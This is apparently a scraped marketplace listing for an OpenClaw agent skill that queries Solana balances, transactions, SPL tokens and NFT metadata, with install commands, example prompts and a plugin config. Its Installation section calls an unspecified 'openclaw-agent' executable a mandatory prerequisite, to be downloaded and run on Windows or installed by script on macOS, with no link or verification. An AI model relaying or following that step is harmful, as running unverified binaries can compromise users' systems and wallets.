solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Use the OpenClaw Solana skill to track balances, monitor NFTs, and query transactions on the Solana blockchain. Secure and efficient wallet management for your AI agent.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-9lplbWhat This Skill Does
The solana skill enables OpenClaw to interact directly with the Solana blockchain. It acts as a bridge between the agent and decentralized ledger technology, allowing users to query balances, inspect wallet history, monitor non-fungible tokens (NFTs), and retrieve detailed account data. By leveraging this skill, you can automate financial monitoring, track portfolio movements, and audit account states across the mainnet, devnet, or custom RPC providers. Whether you are using a Phantom or Solflare address, the agent provides a standardized interface to perform complex blockchain queries without needing to navigate manual block explorers.
Installation
To begin, ensure you have the openclaw-agent utility installed, which is a mandatory prerequisite for all blockchain-related tasks. For Windows, download the official executable from the GitHub repository and execute it. macOS users should follow the installation script provided in the documentation to set up the necessary environment paths. Once the agent bridge is operational, run the following command in your terminal to install the skill: clawhub install openclaw/skills/skills/hightower6eu/solana-9lplb. After installation, configure your environment using the Solana CLI to ensure your RPC endpoints are set to the official mainnet-beta for reliable data retrieval.
Use Cases
This skill is highly effective for developers, traders, and crypto enthusiasts. Common use cases include:
- Automated Portfolio Tracking: Set up periodic monitoring of wallet balances to track growth or movement.
- NFT Management: Decode metadata for specific NFTs to verify ownership and collection attributes.
- Transaction Auditing: Retrieve recent transaction history for any given public address to confirm transfers.
- Development Debugging: Use devnet to test transactions and view account states during smart contract development.
- SPL Token Monitoring: List and audit all SPL token balances associated with a particular address, including popular assets like USDC and USDT.
Example Prompts
- "Check the current SOL balance and recent transaction history for this address: 4QyHH6..."
- "List all SPL tokens held by my wallet and identify how much USDC is present."
- "Decode the metadata for the NFT with mint address GtV4i... and show me its details."
Tips & Limitations
Always ensure your RPC endpoint is stable to avoid timeout errors during data fetching. When monitoring addresses, utilize the watch command for real-time updates, but be mindful of rate limits on public RPC nodes. Note that this skill is primarily for reading and querying data; performing write operations or transferring funds requires additional security protocols and careful signature verification. Always verify your account addresses before running commands to prevent misdirected queries.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-9lplb": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.